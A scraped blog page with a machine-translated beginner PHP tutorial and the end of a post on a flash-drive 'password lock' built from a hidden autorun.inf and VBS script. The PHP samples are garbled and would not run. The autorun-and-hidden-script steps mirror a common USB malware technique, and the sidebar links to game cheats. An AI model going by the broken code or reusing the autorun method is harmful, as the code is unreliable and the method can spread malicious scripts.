you can change the word "completed FLASHDISK CODE" according to the words of your own desires pearls.
after that do storage as the first file, but in the File name write "autorun.inf" without the quotes, before the save as sure select all files.
Then move the two files you created earlier (autorun.inf and passwordlock.vbs) into your flash.
last step please autorun.inf and hidden passwordlock.vbs made earlier.
How to hidden: right click on each autorun.inf and then select Properties passwordlock.vbs check the box on the sign is hidden. done. . . .
@ info
- support with windows XP.
- Please do not forget the password itself (spicy sweet love not responsible for their own password error)
you please comment on this post!

Friday, May 22, 2009

INTRODUCTION PHP
PHP is a scripting language that integrates with the HTML and run on the server side. This means that all the syntax that we provide will be fully executed on the server while the browser is sent to the result only.
File contoh1.php:


<br />Simple Example <br /></ title> <br /></ head> <br /><body> <br /><? php <br />echo ( "Hallo apakabar? My name is PHP script"); <br />?> <br /></ body> <br /></ html> <br />Variable <br />PHP in the name of each variable beginning dollar sign ($). For example the name of a variable in PHP is written with the $ a. Type of a variable is determined at the time of the road program and depending on the context used. <br />File contoh2.php: <br /><? php <br />$ a = "5"; <br />$ b = "2"; <br />$ result = $ a + $ b; <br />echo ($ result); <br />?> <br />STRUCTURE Control <br />IF <br />IF construction is used to perform the execution of a conditional statement. <br />How is written as follows: <br />if (condition) <br />( <br />statement <br />) <br />or: <br />if (condition) <br />( <br />statement <br />) <br />else <br />( <br />another statement <br />) <br />or: <br />if (first condition) <br />( <br />The first statement <br />) <br />elseif (both terms) <br />( <br />second statement <br />) <br />else <br />( <br />another statement <br />) <br />File contoh5.php: <br /><? php <br />$ a = 4; <br />$ b = 9; <br />if ($ a> $ b) <br />( <br />echo ( "a is greater than in b"); <br />) <br />elseif ($ a <$ b) <br />( <br />echo ( "a small b"); <br />) <br />else <br />( <br />echo ( "a with the b"); <br />) <br />?> <br />While <br />Form the basis of the While statement is as follows: <br />while (condition) <br />( <br />statement <br />) <br />While the meaning of statemant is to give the command to execute the statement <br />underneath are repeated, during the condition fulfilled. <br />File contoh6.php: <br /><? php <br />$ a = 1; <br />while ($ a <10) <br />( <br />echo ($ a); <br />$ a + +; <br />) <br />?> <br />FOR <br />How to write FOR statement is as follows: <br />for (ekspresi1; ekspresi2; ekspresi3) <br />statement <br />ekspresi1 initial value for a variable <br />ekspresi2 shows the requirements that must be met to run statemant <br />ekspresi3 show value-added to a variable <br />File contoh7.php: <br /><? php <br />for ($ a = 0; $ a <10; $ a + +) <br />( <br />echo ( "A = value"); <br />echo ( "$ a"); <br />echo ( "<br>"); <br />) <br />?> <br />SWITCH <br />SWITCH statement is used to compare a variable with some <br />value and the statement if the value of certain variables with the same value <br />compared. <br />Switch structure is as follows: <br />switch (variable) <br />case value: <br />statement <br />case value: <br />statemant <br />case value: <br />statement <br />. <br />. <br />. <br />File contoh8.php: <br /><? php <br />$ a = 2; <br />switch ($ a) <br />( <br />case 1: <br />echo ( "Value is a variable one"); <br />break; <br />case 2: <br />echo ( "Value is a two-variable"); <br />break; <br />case 3: <br />echo ( "Value is a three-variable"); <br />break; <br />) <br />?> <br />Require <br />Require statement is used to read the variable value and function of a file. How to write Require statement is: <br />require (filename); <br />Require this statement can not be entered diadalam a looping structure such as while or for. Because only pemangggilan the same file only once. <br />File contoh9.php: <br /><? php <br />$ a = "I'm learning PHP"; <br />tulistebal function ($ text) <br />( <br />echo ( "<b> $ text </ b>"); <br />) <br />?> <br />File contoh10.php: <br /><? php <br />require ( "contoh9.php"); <br />tulistebal ( "This is a bold any posts"); <br />echo ( "<br>"); <br />echo ($ a); <br />?> <br />Include <br />Include statement will include the content of a particular file. Include can be put <br />eg in a looping in a for or while statement. <br />File contoh11.php: <br /><? php <br />echo ("-------------< br> "); <br />echo ( "PHP is a scripting language <br>"); <br />echo ("-------------< br> "); <br />echo ( "<br>"); <br />?> <br />File contoh12.php: <br /><? php <br />for ($ b = 1; $ b <5; $ b + +) <br />( <br />include ( "contoh11.php"); <br />) <br />?></div> <script type='text/javascript'>createSummaryAndThumb("summary951279203302116417");</script> <div class='readmorecontent'> <a class='readmore' href='http://techalexa.blogspot.com/2009/05/introduction-php.html'>Read More </a> </div> <div style='clear: both;'></div> </div> </div> </div> <div style='clear: both;'></div> </div> </div></div> <!--Can't find substitution for tag [adEnd]--> </div> <div style='clear: both;'></div> <div class='blog-pager' id='blog-pager'> <span id='blog-pager-older-link'> <a class='blog-pager-older-link' href='http://techalexa.blogspot.com/search/label/pemrogramman?updated-max=2009-05-22T13:20:00%2B07:00&max-results=20&start=20&by-date=false' id='Blog1_blog-pager-older-link' title='Older Posts'>Older Posts</a> </span> <a class='home-link' href='http://techalexa.blogspot.com/'>Home</a> </div> <div class='clear'></div> <div class='blog-feeds'> <div class='feed-links'> Subscribe to: <a class='feed-link' href='http://techalexa.blogspot.com/feeds/posts/default' target='_blank' type='application/atom+xml'>Posts (Atom)</a> </div> </div> </div></div> </div> </div> <div class='span-8 last'> <div id='subscriptions'> <a href='http://feeds.feedburner.com/alexa-com'><img alt='Subscribe to RSS Feed' src='http://4.bp.blogspot.com/-pGvlOv8vK6c/UYQrw7wtcAI/AAAAAAAAIhE/vaSR44ygTII/s000/rss.png' title='Subscribe to RSS Feed'/></a> <a href='http://twitter.com/alexaprayogo' title='Follow me on Twitter!'><img alt='Follow me on Twitter!' src='http://3.bp.blogspot.com/-yUfDq4rLAuE/UYQrxGGb5sI/AAAAAAAAIhM/jXNYspNx740/s000/twitter.png' title='Follow me on Twitter!'/></a> </div> <div id='sidebar'> <div id='search'> <div class='searchlayout'> <form action='http://techalexa.blogspot.com/search/' id='searchform' method='get'> <input id='s' name='q' onblur='if (this.value == '') {this.value = 'Search';}' onfocus='if (this.value == 'Search') {this.value = '';}' type='text' value='Search'/> <input src='http://3.bp.blogspot.com/-CRSznU_i0y8/UYQrxW5uJNI/AAAAAAAAIhU/37arM3YfFIU/s000/search.gif' style='border:0; vertical-align: top;' type='image'/> </form> </div> </div> <div class='addthis_toolbox'> <div class='custom_images'> <a class='addthis_button_twitter'><img alt='Twitter' height='32' src='http://4.bp.blogspot.com/-oLxpVQa62q4/UYQrxjHWEhI/AAAAAAAAIhc/KjIberK0GkY/s000/twitter.png' width='32'/></a> <a class='addthis_button_delicious'><img alt='Delicious' height='32' src='http://2.bp.blogspot.com/-fsNmoQA0rVQ/UYQryCpLTGI/AAAAAAAAIhk/xDo0XWjmPq8/s000/delicious.png' width='32'/></a> <a class='addthis_button_facebook'><img alt='Facebook' height='32' src='http://2.bp.blogspot.com/-i3xapEA1Dk8/UYQryaG0P5I/AAAAAAAAIhs/EI52X3L0pWY/s000/facebook.png' width='32'/></a> <a class='addthis_button_digg'><img alt='Digg' height='32' src='http://2.bp.blogspot.com/-LSgGK_Fem38/UYQryt3af0I/AAAAAAAAIh0/Xwg96d3cvlQ/s000/digg.png' width='32'/></a> <a class='addthis_button_stumbleupon'><img alt='Stumbleupon' height='32' src='http://2.bp.blogspot.com/-JHcdv5WHKx8/UYQrzHb_tGI/AAAAAAAAIh8/IgOCSTKN-V4/s000/stumbleupon.png' width='32'/></a> <a class='addthis_button_favorites'><img alt='Favorites' height='32' src='http://1.bp.blogspot.com/-oWMGPUfnqVA/UYQrzXXNKMI/AAAAAAAAIiE/f6cINT5AsyU/s000/favorites.png' width='32'/></a> <a class='addthis_button_more'><img alt='More' height='32' src='http://3.bp.blogspot.com/-HCHq3axysME/UYQrzt3JD2I/AAAAAAAAIiM/sOoXQSn22_k/s000/more.png' width='32'/></a> </div> <script src='http://s7.addthis.com/js/250/addthis_widget.js' type='text/javascript'></script> </div> <div style='text-align: center; margin-top: 5px;'> <a href='#' target='_new'><img class='banner125' src='http://3.bp.blogspot.com/-Wf70W39-9uE/UYQrz0WLgWI/AAAAAAAAIiU/_lr2tevzL2Q/s000/125bnr.gif'/></a> <a href='#' target='_new'><img class='banner125' src='http://3.bp.blogspot.com/-Wf70W39-9uE/UYQrz0WLgWI/AAAAAAAAIiU/_lr2tevzL2Q/s000/125bnr.gif'/></a> </div> <div class='sidebar section' id='sidebartop'> <div class='widget PopularPosts' data-version='1' id='PopularPosts1'> <h2>Popular Posts</h2> <div class='widget-content popular-posts'> <ul> <li> <div class='item-content'> <div class='item-thumbnail'> <a href='http://techalexa.blogspot.com/2010/12/cheat-point-blank-pb-rhax-rebornv3.html' target='_blank'> <img alt='' border='0' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-dwBQKipdJD0HlkdeHmoTeLxC8ohAvLzYHQirqNgksRDq9-tE-svt1_Ih8_ohgmQjjfkYOlkc11tkCfBBbN4e8Si-xcIie2xW8IJ8s47cgsKeMv9t6dRfaVSGvmBv9wrxnkAruAFWbeA/w72-h72-p-k-no-nu/Point-Blank+-+Cheat+Hack+Title.jpg'/> </a> </div> <div class='item-title'><a href='http://techalexa.blogspot.com/2010/12/cheat-point-blank-pb-rhax-rebornv3.html'>Cheat Point Blank (PB) [R]HAX-RebornV3 December 27, 2010</a></div> <div class='item-snippet'> Product Name: [R] Hax V3-Reborn Released: 26-12-2010 Creator: RCD Supported Version: PB Indo (ALL Hack Supported), PB Thailand, PB Russi...</div> </div> <div style='clear: both;'></div> </li> <li> <div class='item-content'> <div class='item-thumbnail'> <a href='http://techalexa.blogspot.com/2007/07/contact-us.html' target='_blank'> <img alt='' border='0' src='https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_twTIATG98qXQG7Oo9hj3dC7L-aAV8FzzM91Xr_GLmJaZR0DM-OYw_fGVwQs63pd-Eo-ZyWcHiPXqFU2Rx33a674wVJLqs=w72-h72-p-k-no-nu'/> </a> </div> <div class='item-title'><a href='http://techalexa.blogspot.com/2007/07/contact-us.html'>Contact Us</a></div> <div class='item-snippet'> Please send Critique, Suggestions, and Reports From the following through : Email Facebook Twitter </div> </div> <div style='clear: both;'></div> </li> <li> <div class='item-content'> <div class='item-thumbnail'> <a href='http://techalexa.blogspot.com/2010/07/toolbar-alexa-com-weblog.html' target='_blank'> <img alt='' border='0' src='https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tSo-3EKPcOBT2flpcS831JUviy0MmP58CMk-VKZRFzDf2AVYvNMFAsaMSJfjKdp23KjyuRhxhAo6BEwr0mljU-zHu0ysPj983ZWmOX_qYfPJ0VW6_ecJQQ8GLeIUEyC7UkEdhBaL5uSOuwut8=w72-h72-p-k-no-nu'/> </a> </div> <div class='item-title'><a href='http://techalexa.blogspot.com/2010/07/toolbar-alexa-com-weblog.html'>Toolbar Alexa-com Weblog</a></div> <div class='item-snippet'> Today is a very nice day for myself because I do various activities beneficial for all of you. Weblog Alexa-com may have been down for ...</div> </div> <div style='clear: both;'></div> </li> <li> <div class='item-content'> <div class='item-thumbnail'> <a href='http://techalexa.blogspot.com/2010/12/naruto-shippuden-episode-191.html' target='_blank'> <img alt='' border='0' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS0icW3ep16AuTzrQiOuNi6F3cu58FXMMt3mqm2xljfMk2M6aJbadDbCqXfrdY13tSaWtk2xaqzXEX4vY7UMGZgL-du2OFXGCL0Q7ZXhye0iY19NvDSCGrrnwYiHlCglkjD7FKewbQTXs/w72-h72-p-k-no-nu/naruto.jpg'/> </a> </div> <div class='item-title'><a href='http://techalexa.blogspot.com/2010/12/naruto-shippuden-episode-191.html'>Naruto Shippuden - Episode 191</a></div> <div class='item-snippet'> http://d01.megashares.com/dl/3AhHtgB/Naruto_Shippuden_191.avi http://hotfile.com/dl/90291154/2d7ad76/Naruto_Shippuden_191.part1.rar.html ...</div> </div> <div style='clear: both;'></div> </li> <li> <div class='item-content'> <div class='item-thumbnail'> <a href='http://techalexa.blogspot.com/2010/12/cheat-ninja-saga-ns-december-27-2010.html' target='_blank'> <img alt='' border='0' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbR0sPQiOmbKVOsyHYIrwyOVgYBin9FwvACOykXBu-f3KCtK9IzgyEO5n3hFH-geQETkdrQR_5Ler-4RRJFabo_NkbQ4JAKoLSz9WVolZtTeSeFMnrL5IElhweWyQ_10iixB7sE16Ruuo/w72-h72-p-k-no-nu/ninjasaga4539733.jpg'/> </a> </div> <div class='item-title'><a href='http://techalexa.blogspot.com/2010/12/cheat-ninja-saga-ns-december-27-2010.html'>Cheat Ninja Saga (NS) December 27, 2010 One hit kill boss and Special Jutsu</a></div> <div class='item-snippet'> Are you fond of Ninjas and action packed flash games involving chakra, ninja skills, genjutsu, taijutsu and other stuff like the Naruto ani...</div> </div> <div style='clear: both;'></div> </li> </ul> <div class='clear'></div> </div> </div><div class='widget HTML' data-version='1' id='HTML6'> <h2 class='title'>Google Friend Connect</h2> <div class='widget-content'> <!-- Include the Google Friend Connect javascript library. --> <script type="text/javascript" src="http://www.google.com/friendconnect/script/friendconnect.js"></script> <!-- Define the div tag where the gadget will be inserted. --> <div id="div-6414428464576605168" style="width:286px;border:1px solid #cccccc;"></div> <!-- Render the gadget into a div. --> <script type="text/javascript"> var skin = {}; skin['BORDER_COLOR'] = '#cccccc'; skin['ENDCAP_BG_COLOR'] = '#e0ecff'; skin['ENDCAP_TEXT_COLOR'] = '#333333'; skin['ENDCAP_LINK_COLOR'] = '#0000cc'; skin['ALTERNATE_BG_COLOR'] = '#ffffff'; skin['CONTENT_BG_COLOR'] = '#ffffff'; skin['CONTENT_LINK_COLOR'] = '#0000cc'; skin['CONTENT_TEXT_COLOR'] = '#333333'; skin['CONTENT_SECONDARY_LINK_COLOR'] = '#7777cc'; skin['CONTENT_SECONDARY_TEXT_COLOR'] = '#666666'; skin['CONTENT_HEADLINE_COLOR'] = '#333333'; skin['NUMBER_ROWS'] = '2'; google.friendconnect.container.setParentUrl('/' /* location of rpc_relay.html and canvas.html */); google.friendconnect.container.renderMembersGadget( { id: 'div-6414428464576605168', site: '03006243125111753418' }, skin); </script> </div> </div><div class='widget HTML' data-version='1' id='HTML5'> <h2 class='title'>Facebook Friend Connect</h2> <div class='widget-content'> <iframe src="http://www.facebook.com/plugins/likebox.php?id=280050645782&width=300&connections=15&stream=false&header=false&height=325" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:286px; background:#f1f1f1;height:325px;"></iframe> </div> </div></div> </div> </div> </div><!--/container--> <div id='footer'> Copyright © <script type='text/javascript'>var creditsyear = new Date();document.write(creditsyear.getFullYear());</script> <a href='http://techalexa.blogspot.com/'>Alexa-com Weblog</a> | Support by Google Inc </div><!--/footer--> </div><!--/wrapper--> <script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/4290687098-widgets.js"></script> <script type='text/javascript'> window['__wavt'] = 'AOuZoY5QzqNdeD61W4tpRJ86DiWSKDBH0w:1714721242806';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d5268628345988877796','//techalexa.blogspot.com/search/label/pemrogramman','5268628345988877796'); _WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '5268628345988877796', 'title': 'Alexa-com Weblog', 'url': 'http://techalexa.blogspot.com/search/label/pemrogramman', 'canonicalUrl': 'http://techalexa.blogspot.com/search/label/pemrogramman', 'homepageUrl': 'http://techalexa.blogspot.com/', 'searchUrl': 'http://techalexa.blogspot.com/search', 'canonicalHomepageUrl': 'http://techalexa.blogspot.com/', 'blogspotFaviconUrl': 'http://techalexa.blogspot.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': false, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': 'UA-18275071-1', 'encoding': 'UTF-8', 'locale': 'en', 'localeUnderscoreDelimited': 'en', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22Alexa-com Weblog - Atom\x22 href\x3d\x22http://techalexa.blogspot.com/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22Alexa-com Weblog - RSS\x22 href\x3d\x22http://techalexa.blogspot.com/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22Alexa-com Weblog - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/5268628345988877796/posts/default\x22 /\x3e\n', 'meTag': '\x3clink rel\x3d\x22me\x22 href\x3d\x22https://www.blogger.com/profile/03706072572552206456\x22 /\x3e\n', 'adsenseClientId': 'ca-pub-1883875810542838', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': false, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/a26ecadc30bb77e6', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Get link', 'key': 'link', 'shareMessage': 'Get link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Share to Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'Twitter', 'key': 'twitter', 'shareMessage': 'Share to Twitter', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Share to Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27en\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Read more', 'pageType': 'index', 'searchLabel': 'pemrogramman', 'pageName': 'pemrogramman', 'pageTitle': 'Alexa-com Weblog: pemrogramman', 'metaDescription': 'A blog about Computer Network and Technology Information World.'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Link copied to clipboard!', 'ok': 'Ok', 'postLink': 'Post Link'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Custom', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'Alexa-com Weblog', 'description': 'A blog about Computer Network and Technology Information World.', 'url': 'http://techalexa.blogspot.com/search/label/pemrogramman', 'type': 'feed', 'isSingleItem': false, 'isMultipleItems': true, 'isError': false, 'isPage': false, 'isPost': false, 'isHomepage': false, 'isArchive': false, 'isSearch': true, 'isLabelSearch': true, 'search': {'label': 'pemrogramman', 'resultsMessage': 'Showing posts with the label pemrogramman', 'resultsMessageHtml': 'Showing posts with the label \x3cspan class\x3d\x27search-label\x27\x3epemrogramman\x3c/span\x3e'}}}]); _WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header', document.getElementById('Header1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_PageListView', new _WidgetInfo('PageList8', 'nbttopmenu', document.getElementById('PageList8'), {'title': 'Pages - Menu', 'links': [{'isCurrentPage': false, 'href': 'http://techalexa.blogspot.com/', 'title': 'Home'}, {'isCurrentPage': false, 'href': 'http://www.alexa-com.net/2006/01/about-alexa-com-weblog.html', 'title': 'About'}, {'isCurrentPage': false, 'href': 'http://www.alexa-com.net/2007/07/contact-us.html', 'title': 'Contact Us'}, {'isCurrentPage': false, 'href': 'http://www.alexa-com.net/2005/02/privacy-policy.html', 'title': 'Privacy Policy'}, {'isCurrentPage': false, 'href': 'http://www.alexa-com.net/2006/01/sitemap.html', 'title': 'SiteMap'}, {'isCurrentPage': false, 'href': 'http://www.alexa-com.net/2006/02/donation.html', 'title': 'Donation'}], 'mobile': false, 'showPlaceholder': true, 'hasCurrentPage': false}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'mainblog', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'navMessage': 'Showing posts with label \x3cb\x3epemrogramman\x3c/b\x3e. \x3ca href\x3d\x22http://techalexa.blogspot.com/\x22\x3eShow all posts\x3c/a\x3e', 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/1666805145-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/13464135-lightbox_bundle.css'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_PopularPostsView', new _WidgetInfo('PopularPosts1', 'sidebartop', document.getElementById('PopularPosts1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML6', 'sidebartop', document.getElementById('HTML6'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML5', 'sidebartop', document.getElementById('HTML5'), {}, 'displayModeFull')); </script> </body> </html>